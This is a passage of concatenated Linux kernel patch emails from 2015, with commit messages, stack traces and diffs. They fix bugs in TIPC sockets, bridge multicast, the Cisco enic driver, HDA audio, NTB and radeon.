socket directly after probe failure If the TIPC connection timer expires in a probing state, a self abort message is supposed to be generated and delivered to the local socket. This is currently broken, and the abort message is actually sent out to the peer node with invalid addressing information. This will cause the link to enter a constant retransmission state and eventually reset. We fix this by removing the self-abort message creation and tear down connection immediately instead. Signed-off-by: Erik Hugne Reviewed-by: Ying Xue Reviewed-by: Jon Maloy Signed-off-by: David S. Miller --- net/tipc/socket.c | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/net/tipc/socket.c b/net/tipc/socket.c index 9074b5cede38..f485600c4507 100644 --- a/net/tipc/socket.c +++ b/net/tipc/socket.c @@ -2142,11 +2142,17 @@ static void tipc_sk_timeout(unsigned long data) peer_node = tsk_peer_node(tsk); if (tsk->probing_state == TIPC_CONN_PROBING) { - /* Previous probe not answered -> self abort */ - skb = tipc_msg_create(TIPC_CRITICAL_IMPORTANCE, - TIPC_CONN_MSG, SHORT_H_SIZE, 0, - own_node, peer_node, tsk->portid, - peer_port, TIPC_ERR_NO_PORT); + if (!sock_owned_by_user(sk)) { + sk->sk_socket->state = SS_DISCONNECTING; + tsk->connected = 0; + tipc_node_remove_conn(sock_net(sk), tsk_peer_node(tsk), + tsk_peer_port(tsk)); + sk->sk_state_change(sk); + } else { + /* Try again later */ + sk_reset_timer(sk, &sk->sk_timer, (HZ / 20)); + } + } else { skb = tipc_msg_create(CONN_MANAGER, CONN_PROBE, INT_H_SIZE, 0, peer_node, own_node, From 1a040eaca1a22f8da8285ceda6b5e4a2cb704867 Mon Sep 17 00:00:00 2001 From: Nikolay Aleksandrov Date: Tue, 9 Jun 2015 10:23:57 -0700 Subject: [PATCH 817/872] bridge: fix multicast router rlist endless loop Since the addition of sysfs multicast router support if one set multicast_router to "2" more than once, then the port would be added to the hlist every time and could end up linking to itself and thus causing an endless loop for rlist walkers. So to reproduce just do: echo 2 > multicast_router; echo 2 > multicast_router; in a bridge port and let some igmp traffic flow, for me it hangs up in br_multicast_flood(). Fix this by adding a check in br_multicast_add_router() if the port is already linked. The reason this didn't happen before the addition of multicast_router sysfs entries is because there's a !hlist_unhashed check that prevents it. Signed-off-by: Nikolay Aleksandrov Fixes: 0909e11758bd ("bridge: Add multicast_router sysfs entries") Acked-by: Herbert Xu Signed-off-by: David S. Miller --- net/bridge/br_multicast.c | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/net/bridge/br_multicast.c b/net/bridge/br_multicast.c index 22fd0419b314..ff667e18b2d6 100644 --- a/net/bridge/br_multicast.c +++ b/net/bridge/br_multicast.c @@ -1167,6 +1167,9 @@ static void br_multicast_add_router(struct net_bridge *br, struct net_bridge_port *p; struct hlist_node *slot = NULL; + if (!hlist_unhashed(&port->rlist)) + return; + hlist_for_each_entry(p, &br->router_list, rlist) { if ((unsigned long) port >= (unsigned long) p) break; @@ -1194,12 +1197,8 @@ static void br_multicast_mark_router(struct net_bridge *br, if (port->multicast_router != 1) return; - if (!hlist_unhashed(&port->rlist)) - goto timer; - br_multicast_add_router(br, port); -timer: mod_timer(&port->multicast_router_timer, now + br->multicast_querier_interval); } From 07f668ae509c92ba41baabc761607a61b5397317 Mon Sep 17 00:00:00 2001 From: Hajime Tazaki Date: Thu, 11 Jun 2015 14:37:39 +0900 Subject: [PATCH 818/872] lib: add FOU and L2TP to defconfig Signed-off-by: Hajime Tazaki --- arch/lib/defconfig | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/arch/lib/defconfig b/arch/lib/defconfig index 9307e6f7eb41..17b648bcca13 100644 --- a/arch/lib/defconfig +++ b/arch/lib/defconfig @@ -70,9 +70,9 @@ CONFIG_IP_PIMSM_V1=y CONFIG_IP_PIMSM_V2=y CONFIG_SYN_COOKIES=y # CONFIG_NET_IPVTI is not set -CONFIG_NET_UDP_TUNNEL=m -# CONFIG_NET_FOU is not set -# CONFIG_NET_FOU_IP_TUNNELS is not set +CONFIG_NET_UDP_TUNNEL=y +CONFIG_NET_FOU=y +CONFIG_NET_FOU_IP_TUNNELS=y # CONFIG_GENEVE is not set CONFIG_INET_AH=y CONFIG_INET_ESP=y @@ -363,8 +363,10 @@ CONFIG_ATM_LANE=m CONFIG_ATM_MPOA=m CONFIG_ATM_BR2684=m CONFIG_ATM_BR2684_IPFILTER=y -CONFIG_L2TP=m -# CONFIG_L2TP_V3 is not set +CONFIG_L2TP=y +CONFIG_L2TP_V3=y +CONFIG_L2TP_IP=y +CONFIG_L2TP_ETH=y CONFIG_STP=m CONFIG_GARP=m CONFIG_BRIDGE=m From ae9b00a1943c6675638157501dfdd6d4d4af46c1 Mon Sep 17 00:00:00 2001 From: Hajime Tazaki Date: Thu, 11 Jun 2015 14:39:29 +0900 Subject: [PATCH 819/872] lib: fix atomic64_add to avoid external symbol atomi64_add() is used when "ip l2tp" command is used and caused unresolved symbol issue. This commit fix this issue. Signed-off-by: Hajime Tazaki --- arch/lib/include/asm/atomic.h | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/arch/lib/include/asm/atomic.h b/arch/lib/include/asm/atomic.h index 444a9535c97b..f72c3a8ca48c 100644 --- a/arch/lib/include/asm/atomic.h +++ b/arch/lib/include/asm/atomic.h @@ -13,7 +13,10 @@ typedef struct { #define ATOMIC64_INIT(i) { (i) } #define atomic64_read(v) (*(volatile long *)&(v)->counter) -void atomic64_add(long i, atomic64_t *v); +static inline void atomic64_add(long i, atomic64_t *v) +{ + v->counter += i; +} static inline void atomic64_sub(long i, atomic64_t *v) { v->counter -= i; From 5d753610277862fd8050901f38b6571b9500cdb6 Mon Sep 17 00:00:00 2001 From: Mel Gorman Date: Wed, 10 Jun 2015 21:02:04 -0400 Subject: [PATCH 820/872] net, swap: Remove a warning and clarify why sk_mem_reclaim is required when deactivating swap Jeff Layton reported the following; [ 74.232485] ------------[ cut here ]------------ [ 74.233354] WARNING: CPU: 2 PID: 754 at net/core/sock.c:364 sk_clear_memalloc+0x51/0x80() [ 74.234790] Modules linked in: cts rpcsec_gss_krb5 nfsv4 dns_resolver nfs fscache xfs libcrc32c snd_hda_codec_generic snd_hda_intel snd_hda_controller snd_hda_codec snd_hda_core snd_hwdep snd_seq snd_seq_device nfsd snd_pcm snd_timer snd e1000 ppdev parport_pc joydev parport pvpanic soundcore floppy serio_raw i2c_piix4 pcspkr nfs_acl lockd virtio_balloon acpi_cpufreq auth_rpcgss grace sunrpc qxl drm_kms_helper ttm drm virtio_console virtio_blk virtio_pci ata_generic virtio_ring pata_acpi virtio [ 74.243599] CPU: 2 PID: 754 Comm: swapoff Not tainted 4.1.0-rc6+ #5 [ 74.244635] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 [ 74.245546] 0000000000000000 0000000079e69e31 ffff8800d066bde8 ffffffff8179263d [ 74.246786] 0000000000000000 0000000000000000 ffff8800d066be28 ffffffff8109e6fa [ 74.248175] 0000000000000000 ffff880118d48000 ffff8800d58f5c08 ffff880036e380a8 [ 74.249483] Call Trace: [ 74.249872] [] dump_stack+0x45/0x57 [ 74.250703] [] warn_slowpath_common+0x8a/0xc0 [ 74.251655] [] warn_slowpath_null+0x1a/0x20 [ 74.252585] [] sk_clear_memalloc+0x51/0x80 [ 74.253519] [] xs_disable_swap+0x42/0x80 [sunrpc] [ 74.254537] [] rpc_clnt_swap_deactivate+0x7e/0xc0 [sunrpc] [ 74.255610] [] nfs_swap_deactivate+0x27/0x30 [nfs] [ 74.256582] [] destroy_swap_extents+0x74/0x80 [ 74.257496] [] SyS_swapoff+0x222/0x5c0 [ 74.258318] [] ? syscall_trace_leave+0xc7/0x140 [ 74.259253] [] system_call_fastpath+0x12/0x71 [ 74.260158] ---[ end trace 2530722966429f10 ]--- The warning in question was unnecessary but with Jeff's series the rules are also clearer. This patch removes the warning and updates the comment to explain why sk_mem_reclaim() may still be called. [jlayton: remove if (sk->sk_forward_alloc) conditional. As Leon points out that it's not needed.] Cc: Leon Romanovsky Signed-off-by: Mel Gorman Signed-off-by: Jeff Layton Signed-off-by: David S. Miller --- net/core/sock.c | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/net/core/sock.c b/net/core/sock.c index 292f42228bfb..469d6039c7f5 100644 --- a/net/core/sock.c +++ b/net/core/sock.c @@ -354,15 +354,12 @@ void sk_clear_memalloc(struct sock *sk) /* * SOCK_MEMALLOC is allowed to ignore rmem limits to ensure forward - * progress of swapping. However, if SOCK_MEMALLOC is cleared while - * it has rmem allocations there is a risk that the user of the - * socket cannot make forward progress due to exceeding the rmem - * limits. By rights, sk_clear_memalloc() should only be called - * on sockets being torn down but warn and reset the accounting if - * that assumption breaks. + * progress of swapping. SOCK_MEMALLOC may be cleared while + * it has rmem allocations due to the last swapfile being deactivated + * but there is a risk that the socket is unusable due to exceeding + * the rmem limits. Reclaim the reserves and obey rmem limits again. */ - if (WARN_ON(sk->sk_forward_alloc)) - sk_mem_reclaim(sk); + sk_mem_reclaim(sk); } EXPORT_SYMBOL_GPL(sk_clear_memalloc); From 6286e8285078ab02b215bba1d42a05ecfd864515 Mon Sep 17 00:00:00 2001 From: Govindarajulu Varadarajan <_govind@gmx.com> Date: Thu, 11 Jun 2015 11:52:54 +0530 Subject: [PATCH 821/872] enic: unlock napi busy poll before unmasking intr There is a small window between vnic_intr_unmask() and enic_poll_unlock_napi(). In this window if an irq occurs and napi is scheduled on different cpu, it tries to acquire enic_poll_lock_napi() and hits the following WARN_ON message. Fix is to unlock napi_poll before unmasking the interrupt. [ 781.121746] ------------[ cut here ]------------ [ 781.121789] WARNING: CPU: 1 PID: 0 at drivers/net/ethernet/cisco/enic/vnic_rq.h:228 enic_poll_msix_rq+0x36a/0x3c0 [enic]() [ 781.121834] Modules linked in: nfsv3 nfs_acl rpcsec_gss_krb5 auth_rpcgss oid_registry nfsv4 dns_resolver coretemp intel_rapl iosf_mbi x86_pkg_temp_thermal intel_powerclamp kvm_intel kvm crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel mgag200 ttm drm_kms_helper joydev aes_x86_64 lrw drm gf128mul mousedev glue_helper sb_edac ablk_helper iTCO_wdt iTCO_vendor_support evdev ipmi_si syscopyarea sysfillrect sysimgblt i2c_algo_bit i2c_core edac_core lpc_ich mac_hid cryptd pcspkr ipmi_msghandler shpchp tpm_tis acpi_power_meter tpm wmi processor hwmon button ac sch_fq_codel nfs lockd grace sunrpc fscache hid_generic usbhid hid ehci_pci ehci_hcd sd_mod megaraid_sas usbcore scsi_mod usb_common enic crc32c_generic crc32c_intel btrfs xor raid6_pq ext4 crc16 mbcache jbd2 [ 781.122176] CPU: 1 PID: 0 Comm: swapper/1 Not tainted 4.1.0-rc6-ARCH-00040-gc46a024-dirty #106 [ 781.122210] Hardware name: Cisco Systems Inc UCSB-B200-M4/UCSB-B200-M4, BIOS B200M4.2.2.2.23.061220140128 06/12/2014 [ 781.122252] 0000000000000000 bddbbc9d655ec96e ffff880277e43da8 ffffffff81583fe8 [ 781.122286] 0000000000000000 0000000000000000 ffff880277e43de8 ffffffff8107acfa [ 781.122319] ffff880272c01000 ffff880273f18000 ffff880273f1a100 0000000000000000 [ 781.122352] Call Trace: [ 781.122364] [] dump_stack+0x4f/0x7b [ 781.122399] [] warn_slowpath_common+0x8a/0xc0 [ 781.122425] [] warn_slowpath_null+0x1a/0x20 [ 781.122455] [] enic_poll_msix_rq+0x36a/0x3c0 [enic] [ 781.122487] [] net_rx_action+0x22a/0x370 [ 781.122512] [] __do_softirq+0xed/0x2d0 [ 781.122537] [] irq_exit+0x7e/0xa0 [ 781.122560] [] do_IRQ+0x64/0x100 [ 781.122582] [] common_interrupt+0x6e/0x6e [ 781.122605] [] ? cpu_startup_entry+0x121/0x480 [ 781.122638] [] ? cpu_startup_entry+0xec/0x480 [ 781.122667] [] ? clockevents_register_device+0x113/0x1f0 [ 781.122698] [] start_secondary+0x196/0x1e0 [ 781.122723] ---[ end trace cec2e9dd3af7b9db ]--- Signed-off-by: Govindarajulu Varadarajan <_govind@gmx.com> Signed-off-by: David S. Miller --- drivers/net/ethernet/cisco/enic/enic_main.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/cisco/enic/enic_main.c b/drivers/net/ethernet/cisco/enic/enic_main.c index 204bd182473b..0e5a01dd7545 100644 --- a/drivers/net/ethernet/cisco/enic/enic_main.c +++ b/drivers/net/ethernet/cisco/enic/enic_main.c @@ -1407,6 +1407,7 @@ static int enic_poll_msix_rq(struct napi_struct *napi, int budget) */ enic_calc_int_moderation(enic, &enic->rq[rq]); + enic_poll_unlock_napi(&enic->rq[rq]); if (work_done < work_to_do) { /* Some work done, but not enough to stay in polling, @@ -1418,7 +1419,6 @@ static int enic_poll_msix_rq(struct napi_struct *napi, int budget) enic_set_int_moderation(enic, &enic->rq[rq]); vnic_intr_unmask(&enic->intr[intr]); } - enic_poll_unlock_napi(&enic->rq[rq]); return work_done; } From 19b596bda1c5400808635fde0d521c1f89a6c1a3 Mon Sep 17 00:00:00 2001 From: Govindarajulu Varadarajan <_govind@gmx.com> Date: Thu, 11 Jun 2015 11:52:55 +0530 Subject: [PATCH 822/872] enic: check return value for stat dump We do not check the return value of enic_dev_stats_dump(). If allocation fails, we will hit NULL pointer reference. Return only if memory allocation fails. For other failures, we return the previously recorded values. Signed-off-by: Govindarajulu Varadarajan <_govind@gmx.com> Signed-off-by: David S. Miller --- .../net/ethernet/cisco/enic/enic_ethtool.c | 20 ++++++++++++++++--- drivers/net/ethernet/cisco/enic/enic_main.c | 9 ++++++++- 2 files changed, 25 insertions(+), 4 deletions(-) diff --git a/drivers/net/ethernet/cisco/enic/enic_ethtool.c b/drivers/net/ethernet/cisco/enic/enic_ethtool.c index 28d9ca675a27..68d47b196dae 100644 --- a/drivers/net/ethernet/cisco/enic/enic_ethtool.c +++ b/drivers/net/ethernet/cisco/enic/enic_ethtool.c @@ -131,8 +131,15 @@ static void enic_get_drvinfo(struct net_device *netdev, { struct enic *enic = netdev_priv(netdev); struct vnic_devcmd_fw_info *fw_info; + int err; - enic_dev_fw_info(enic, &fw_info); + err = enic_dev_fw_info(enic, &fw_info); + /* return only when pci_zalloc_consistent fails in vnic_dev_fw_info + * For other failures, like devcmd failure, we return previously + * recorded info. + */ + if (err == -ENOMEM) + return; strlcpy(drvinfo->driver, DRV_NAME, sizeof(drvinfo->driver)); strlcpy(drvinfo->version, DRV_VERSION, sizeof(drvinfo->version)); @@ -181,8 +188,15 @@ static void enic_get_ethtool_stats(struct net_device *netdev, struct enic *enic = netdev_priv(netdev); struct vnic_stats *vstats; unsigned int i; - - enic_dev_stats_dump(enic, &vstats); + int err; + + err = enic_dev_stats_dump(enic, &vstats); + /* return only when pci_zalloc_consistent fails in vnic_dev_stats_dump + * For other failures, like devcmd failure, we return previously + * recorded stats. + */ + if (err == -ENOMEM) + return; for (i = 0; i < enic_n_tx_stats; i++) *(data++) = ((u64 *)&vstats->tx)[enic_tx_stats[i].index]; diff --git a/drivers/net/ethernet/cisco/enic/enic_main.c b/drivers/net/ethernet/cisco/enic/enic_main.c index 0e5a01dd7545..eadae1b412c6 100644 --- a/drivers/net/ethernet/cisco/enic/enic_main.c +++ b/drivers/net/ethernet/cisco/enic/enic_main.c @@ -615,8 +615,15 @@ static struct rtnl_link_stats64 *enic_get_stats(struct net_device *netdev, { struct enic *enic = netdev_priv(netdev); struct vnic_stats *stats; + int err; - enic_dev_stats_dump(enic, &stats); + err = enic_dev_stats_dump(enic, &stats); + /* return only when pci_zalloc_consistent fails in vnic_dev_stats_dump + * For other failures, like devcmd failure, we return previously + * recorded stats. + */ + if (err == -ENOMEM) + return net_stats; net_stats->tx_packets = stats->tx.tx_frames_ok; net_stats->tx_bytes = stats->tx.tx_bytes_ok; From 8b13b4e0bc884ba7dc8ee4de3ee915b7d30e7f78 Mon Sep 17 00:00:00 2001 From: Govindarajulu Varadarajan <_govind@gmx.com> Date: Thu, 11 Jun 2015 11:52:56 +0530 Subject: [PATCH 823/872] enic: fix memory leak in rq_clean When incoming packet qualifies for rx_copybreak, we copy the data to newly allocated skb. We do not free/unmap the original buffer. At this point driver assumes this buffer is unallocated. When enic_rq_alloc_buf() is called for buffer allocation, it checks if buf->os_buf is NULL. If its not NULL that means buffer can be re-used. When vnic_rq_clean() is called for freeing all rq buffers, and if the rx_copybreak reused buffer falls outside the used desc, we do not free the buffer. The following trace is observer when dma-debug is enabled. Fix is to walk through complete ring and clean if buffer is present. [ 40.555386] ------------[ cut here ]------------ [ 40.555396] WARNING: CPU: 0 PID: 491 at lib/dma-debug.c:971 dma_debug_device_change+0x188/0x1f0() [ 40.555400] pci 0000:06:00.0: DMA-API: device driver has pending DMA allocations while released from device [count=4] One of leaked entries details: [device address=0x00000000ff4cc040] [size=9018 bytes] [mapped with DMA_FROM_DEVICE] [mapped as single] [ 40.555402] Modules linked in: nfsv3 nfs_acl rpcsec_gss_krb5 auth_rpcgss oid_registry nfsv4 dns_resolver coretemp intel_rapl iosf_mbi x86_pkg_temp_thermal intel_powerclamp kvm_intel kvm crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 lrw joydev mousedev gf128mul hid_generic glue_helper mgag200 usbhid ttm hid drm_kms_helper drm ablk_helper syscopyarea sysfillrect sysimgblt i2c_algo_bit i2c_core iTCO_wdt cryptd mac_hid evdev pcspkr sb_edac edac_core tpm_tis iTCO_vendor_support ipmi_si wmi tpm ipmi_msghandler shpchp lpc_ich processor acpi_power_meter hwmon button ac sch_fq_codel nfs lockd grace sunrpc fscache sd_mod ehci_pci ehci_hcd megaraid_sas usbcore scsi_mod usb_common enic(-) crc32c_generic crc32c_intel btrfs xor raid6_pq ext4 crc16 mbcache jbd2 [ 40.555467] CPU: 0 PID: 491 Comm: rmmod Not tainted 4.1.0-rc7-ARCH-01305-gf59b71f #118 [ 40.555469] Hardware name: Cisco Systems Inc UCSB-B200-M4/UCSB-B200-M4, BIOS B200M4.2.2.2.23.061220140128 06/12/2014 [ 40.555471] 0000000000000000 00000000e2f8a5b7 ffff880275f8bc48 ffffffff8158d6f0 [ 40.555474] 0000000000000000 ffff880275f8bca0 ffff880275f8bc88 ffffffff8107b04a [ 40.555477] ffff8802734e0000 0000000000000004 ffff8804763fb3c0 ffff88027600b650 [ 40.555480] Call Trace: [ 40.555488] [] dump_stack+0x4f/0x7b [ 40.555492] [] warn_slowpath_common+0x8a/0xc0 [ 40.555494] [] warn_slowpath_fmt+0x55/0x70 [ 40.555498] [] dma_debug_device_change+0x188/0x1f0 [ 40.555503] [] notifier_call_chain+0x4f/0x80 [ 40.555506] [] __blocking_notifier_call_chain+0x4b/0x70 [ 40.555510] [] blocking_notifier_call_chain+0x16/0x20 [ 40.555514] [] __device_release_driver+0xf6/0x120 [ 40.555518] [] driver_detach+0xc8/0xd0 [ 40.555523] [] bus_remove_driver+0x59/0xe0 [ 40.555527] [] driver_unregister+0x30/0x70 [ 40.555534] [] pci_unregister_driver+0x2d/0xa0 [ 40.555542] [] enic_cleanup_module+0x10/0x14e [enic] [ 40.555547] [] SyS_delete_module+0x1cf/0x280 [ 40.555551] [] ? ____fput+0xe/0x10 [ 40.555554] [] ? task_work_run+0xbc/0xf0 [ 40.555558] [] system_call_fastpath+0x12/0x71 [ 40.555561] ---[ end trace 4988cadc77c2b236 ]--- [ 40.555562] Mapped at: [ 40.555563] [] debug_dma_map_page+0x95/0x150 [ 40.555566] [] enic_rq_alloc_buf+0x1b8/0x360 [enic] [ 40.555570] [] enic_open+0xf8/0x820 [enic] [ 40.555574] [] __dev_open+0xce/0x150 [ 40.555579] [] __dev_change_flags+0xa1/0x170 Signed-off-by: Govindarajulu Varadarajan <_govind@gmx.com> Signed-off-by: David S. Miller --- drivers/net/ethernet/cisco/enic/vnic_rq.c | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/cisco/enic/vnic_rq.c b/drivers/net/ethernet/cisco/enic/vnic_rq.c index 36a2ed606c91..c4b2183bf352 100644 --- a/drivers/net/ethernet/cisco/enic/vnic_rq.c +++ b/drivers/net/ethernet/cisco/enic/vnic_rq.c @@ -188,16 +188,15 @@ void vnic_rq_clean(struct vnic_rq *rq, struct vnic_rq_buf *buf; u32 fetch_index; unsigned int count = rq->ring.desc_count; + int i; buf = rq->to_clean; - while (vnic_rq_desc_used(rq) > 0) { - + for (i = 0; i < rq->ring.desc_count; i++) { (*buf_clean)(rq, buf); - - buf = rq->to_clean = buf->next; - rq->ring.desc_avail++; + buf = buf->next; } + rq->ring.desc_avail = rq->ring.desc_count - 1; /* Use current fetch_index as the ring starting point */ fetch_index = ioread32(&rq->ctrl->fetch_index); From a686ec4c5f28eb1b384e4b87b08543155c970072 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Thu, 11 Jun 2015 10:51:28 +0200 Subject: [PATCH 824/872] ALSA: hda - Re-add the lost fake mute support Yet another regression by the transition to regmap cache; for better usability, we had the fake mute control using the zero amp value for Conexant codecs, and this was forgotten in the new hda core code. Since the bits 4-7 are unused for the amp registers (as we follow the syntax of AMP_GET verb), the bit 4 is now used to indicate the fake mute. For setting this flag, snd_hda_codec_amp_update() becomes a function from a simple macro. The bonus is that it gained a proper function description. Signed-off-by: Takashi Iwai --- include/sound/hda_regmap.h | 2 ++ sound/hda/hdac_regmap.c | 5 +++++ sound/pci/hda/hda_codec.c | 25 +++++++++++++++++++++++++ sound/pci/hda/hda_local.h | 4 ++-- 4 files changed, 34 insertions(+), 2 deletions(-) diff --git a/include/sound/hda_regmap.h b/include/sound/hda_regmap.h index 53a18b3635e2..df705908480a 100644 --- a/include/sound/hda_regmap.h +++ b/include/sound/hda_regmap.h @@ -9,6 +9,8 @@ #include #include +#define AC_AMP_FAKE_MUTE 0x10 /* fake mute bit set to amp verbs */ + int snd_hdac_regmap_init(struct hdac_device *codec); void snd_hdac_regmap_exit(struct hdac_device *codec); int snd_hdac_regmap_add_vendor_verb(struct hdac_device *codec, diff --git a/sound/hda/hdac_regmap.c b/sound/hda/hdac_regmap.c index c4f5e61d4404..1eabcdf69457 100644 --- a/sound/hda/hdac_regmap.c +++ b/sound/hda/hdac_regmap.c @@ -246,6 +246,9 @@ static int hda_reg_read(void *context, unsigned int reg, unsigned int *val) return hda_reg_read_stereo_amp(codec, reg, val); if (verb == AC_VERB_GET_PROC_COEF) return hda_reg_read_coef(codec, reg, val); + if ((verb & 0x700) == AC_VERB_SET_AMP_GAIN_MUTE) + reg &= ~AC_AMP_FAKE_MUTE; + err = snd_hdac_exec_verb(codec, reg, 0, val); if (err < 0) return err; @@ -283,6 +286,8 @@ static int hda_reg_write(void *context, unsigned int reg, unsigned int val) switch (verb & 0xf00) { case AC_VERB_SET_AMP_GAIN_MUTE: + if ((reg & AC_AMP_FAKE_MUTE) && (val & AC_AMP_MUTE)) + val = 0; verb = AC_VERB_SET_AMP_GAIN_MUTE; if (reg & AC_AMP_GET_LEFT) verb |= AC_AMP_SET_LEFT >> 8; diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c index b7782212dd64..5645481af3d9 100644 --- a/sound/pci/hda/hda_codec.c +++ b/sound/pci/hda/hda_codec.c @@ -1375,6 +1375,31 @@ int snd_hda_override_amp_caps(struct hda_codec *codec, hda_nid_t nid, int dir, } EXPORT_SYMBOL_GPL(snd_hda_override_amp_caps); +/** + * snd_hda_codec_amp_update - update the AMP mono value + * @codec: HD-audio codec + * @nid: NID to read the AMP value + * @ch: channel to update (0 or 1) + * @dir: #HDA_INPUT or #HDA_OUTPUT + * @idx: the index value (only for input direction) + * @mask: bit mask to set + * @val: the bits value to set + * + * Update the AMP values for the given channel, direction and index. + */ +int snd_hda_codec_amp_update(struct hda_codec *codec, hda_nid_t nid, + int ch, int dir, int idx, int mask, int val) +{ + unsigned int cmd = snd_hdac_regmap_encode_amp(nid, ch, dir, idx); + + /* enable fake mute if no h/w mute but min=mute */ + if ((query_amp_caps(codec, nid, dir) & + (AC_AMPCAP_MUTE | AC_AMPCAP_MIN_MUTE)) == AC_AMPCAP_MIN_MUTE) + cmd |= AC_AMP_FAKE_MUTE; + return snd_hdac_regmap_update_raw(&codec->core, cmd, mask, val); +} +EXPORT_SYMBOL_GPL(snd_hda_codec_amp_update); + /** * snd_hda_codec_amp_stereo - update the AMP stereo values * @codec: HD-audio codec diff --git a/sound/pci/hda/hda_local.h b/sound/pci/hda/hda_local.h index 3b567f42296b..bed66c314431 100644 --- a/sound/pci/hda/hda_local.h +++ b/sound/pci/hda/hda_local.h @@ -129,8 +129,8 @@ int snd_hda_mixer_amp_switch_put_beep(struct snd_kcontrol *kcontrol, /* lowlevel accessor with caching; use carefully */ #define snd_hda_codec_amp_read(codec, nid, ch, dir, idx) \ snd_hdac_regmap_get_amp(&(codec)->core, nid, ch, dir, idx) -#define snd_hda_codec_amp_update(codec, nid, ch, dir, idx, mask, val) \ - snd_hdac_regmap_update_amp(&(codec)->core, nid, ch, dir, idx, mask, val) +int snd_hda_codec_amp_update(struct hda_codec *codec, hda_nid_t nid, + int ch, int dir, int idx, int mask, int val); int snd_hda_codec_amp_stereo(struct hda_codec *codec, hda_nid_t nid, int dir, int idx, int mask, int val); int snd_hda_codec_amp_init(struct hda_codec *codec, hda_nid_t nid, int ch, From ebaad1322d8080a1a8367ec631b345405d9879e2 Mon Sep 17 00:00:00 2001 From: Daniel Verkamp Date: Wed, 13 May 2015 15:50:04 -0700 Subject: [PATCH 825/872] ntb: initialize max_mw for Atom before using it Commit ab760a0 (ntb: Adding split BAR support for Haswell platforms) changed ntb_device's mw from a fixed-size array into a pointer that is allocated based on limits.max_mw; however, on Atom platforms, max_mw is not initialized until ntb_device_setup(), which happens after the allocation. Fill out max_mw in ntb_atom_detect() to match ntb_xeon_detect(); this happens before the use of max_mw in the ndev->mw allocation. Fixes a null pointer dereference on Atom platforms with ntb hardware. v2: fix typo (mw_max should be max_mw) Signed-off-by: Daniel Verkamp Acked-by: Dave Jiang Signed-off-by: Jon Mason --- drivers/ntb/ntb_hw.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/ntb/ntb_hw.c b/drivers/ntb/ntb_hw.c index b5c8707f4ac7..15f9b7c9e4d3 100644 --- a/drivers/ntb/ntb_hw.c +++ b/drivers/ntb/ntb_hw.c @@ -1660,6 +1660,7 @@ static int ntb_atom_detect(struct ntb_device *ndev) u32 ppd; ndev->hw_type = BWD_HW; + ndev->limits.max_mw = BWD_MAX_MW; rc = pci_read_config_dword(ndev->pdev, NTB_PPD_OFFSET, &ppd); if (rc) From 108029323910c5dd1ef8fa2d10da1ce5fbce6e12 Mon Sep 17 00:00:00 2001 From: Wang Long Date: Wed, 10 Jun 2015 08:12:37 +0000 Subject: [PATCH 826/872] ring-buffer-benchmark: Fix the wrong sched_priority of producer The producer should be used producer_fifo as its sched_priority, so correct it. Link: http://lkml.kernel.org/r/1433923957-67842-1-git-send-email-long.wanglong@huawei.com Cc: stable@vger.kernel.org # 2.6.33+ Signed-off-by: Wang Long Signed-off-by: Steven Rostedt --- kernel/trace/ring_buffer_benchmark.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/kernel/trace/ring_buffer_benchmark.c b/kernel/trace/ring_buffer_benchmark.c index 13d945c0d03f..1b28df2d9104 100644 --- a/kernel/trace/ring_buffer_benchmark.c +++ b/kernel/trace/ring_buffer_benchmark.c @@ -450,7 +450,7 @@ static int __init ring_buffer_benchmark_init(void) if (producer_fifo >= 0) { struct sched_param param = { - .sched_priority = consumer_fifo + .sched_priority = producer_fifo }; sched_setscheduler(producer, SCHED_FIFO, ¶m); } else From 6dfd197283bffc23a2b046a7f065588de7e1fc1e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=A9r=C3=B4me=20Glisse?= Date: Fri, 5 Jun 2015 13:33:57 -0400 Subject: [PATCH 827/872] drm/radeon: fix freeze for laptop with Turks/Thames GPU. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Laptop with Turks/Thames GPU will freeze if dpm is enabled. It seems the SMC engine is relying on some state inside the CP engine. CP needs to chew at least one packet for it to get in good state for dynamic power management. This patch simply disabled and re-enable DPM after the ring test which is enough to avoid the freeze. Signed-off-by: Jérôme Glisse Cc: stable@vger.kernel.org Signed-off-by: Alex Deucher --- drivers/gpu/drm/radeon/radeon_device.c | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/drivers/gpu/drm/radeon/radeon_device.c b/drivers/gpu/drm/radeon/radeon_device.c index b7ca4c514621..a7fdfa4f0857 100644 --- a/drivers/gpu/drm/radeon/radeon_device.c +++ b/drivers/gpu/drm/radeon/radeon_device.c @@ -1463,6 +1463,21 @@ int radeon_device_init(struct radeon_device *rdev, if (r) DRM_ERROR("ib ring test failed (%d).\n", r); + /* + * Turks/Thames GPU will freeze whole laptop if DPM is not restarted + * after the CP ring have chew one packet at least. Hence here we stop + * and restart DPM after the radeon_ib_ring_tests(). + */ + if (rdev->pm.dpm_enabled && + (rdev->pm.pm_method == PM_METHOD_DPM) && + (rdev->family == CHIP_TURKS) && + (rdev->flags & RADEON_IS_MOBILITY)) { + mutex_lock(&rdev->pm.mutex); + radeon_dpm_disable(rdev); + radeon_dpm_enable(rdev); + mutex_unlock(&rdev->pm.mutex); + } + if ((radeon_testing & 1)) { if (rdev->accel_working) radeon_test_moves(rdev); From 6fb3c025fee16f11ebd73f84f5aba1ee9ce7f8c6 Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Wed, 10 Jun 2015 01:29:14 -0400 Subject: [PATCH 828/872] Revert "drm/radeon: don't share plls if monitors differ in 